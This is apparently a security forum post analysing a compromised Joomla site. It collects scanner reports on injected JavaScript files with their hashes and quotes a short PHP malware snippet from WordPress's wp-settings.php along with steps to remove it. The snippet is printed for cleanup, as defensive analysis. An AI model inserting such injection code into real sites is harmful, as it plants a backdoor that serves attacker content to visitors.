See what is out there on that IP: http://urlquery.net/report.php?id=8903294 → http://urlquery.net/report.php?id=5023285
with a Detected a Dynamic DNS URL IDS alert. Domain classification: ksportu dot ru,78.108.88.84,ns2.majordomo dot ru,Parked/expired,
see: https://www.virustotal.com/nl/url/8bbea2327a3d96dc7720168a6005a38ab872919232a49c9365d8d90c85586e24/analysis/
site is being blocked by Bitdefender’s TrafficLight but not by avast!
Flagged as blacklisted and likely compromised here: http://sitecheck.sucuri.net/results/ksportu.ru/ → http://www.siteadvisor.com/sites/ksportu.ru
Potentially suspicious files as found up by Quttera’s:
/components/com_comprofiler/js/overlib_hideform_mini.js
Severity: Potentially Suspicious
Reason: Suspicious JavaScript code injection.
Details: Procedure: + has been called with a string containing hidden JavaScript code .
Threat dump: View code here: http://jsunpack.jeek.org/?report=87e9e6c89e92a08dcaf00f399f8fc43f4997f90e
File size[byte]: 3352
File type: ASCII
MD5: F31A5B79F46C88B5243605814F0AAC7A
Scan duration[sec]: 0.068000
and/modules/mod_swmenufree/transmenu_Packed.js
Severity: Potentially Suspicious
Reason: Detected potentially suspicious content.
Details: Detected potentially suspicious initialization of function pointer to JavaScript method write __tmpvar1843205897 = write;
Threat dump: View code here: http://jsunpack.jeek.org/?report=8c8be93443db3d069f89ceb1223a0302baacf12c **
File size[byte]: 11232
File type: ASCII
MD5: 34743AB7C9C049DB07EE7E518F0475A9
Scan duration[sec]: 0.114000
See: ksportu dot ru/modules/swmenufree/Packed.js benign
[nothing detected] (script) ksportu dot ru/modules/swmenufree/Packed.js
status: (referer=ksportu dot ru/)saved 11232 bytes 949cb58326fcf37450aeb699769bbe5cb57e24c4
info: [decodingLevel=0] found JavaScript
info: DecodedIframe detected
info: [img] ksportu.ru/modules/swmenufree/
info: [iframe] ksportu.ru/modules/swmenufree/javascript:false;
info: [decodingLevel=1] found JavaScript
suspicious:
** Site could be vulnerable to the wp-settings.php file modification. Identify the full block of code, as shown below, and remove it:
function check_wordpress(){
$t_d = sys_get_temp_dir();
if(file_exists($t_d . ‘/wp_inc’)){
readfile($t_d . ‘/wp_inc’);
}
}
add_action(‘wp_head’, ‘check_wordpress’);
do_action( ‘init’ );
Now, save the file and upload it back to your server, overwriting the version that is already there. This will have removed the malware, malicious script from your wordpress blog. Credits for removal routine and code go to Stop Badware link poster Steve Charlbury!
Also module was open to bug abuse: https://www.joomlapolis.com/forum/43-bugs/42314-swmenupro-users-watch-out-confirmed-bug
link credits: ffaabbss
polonus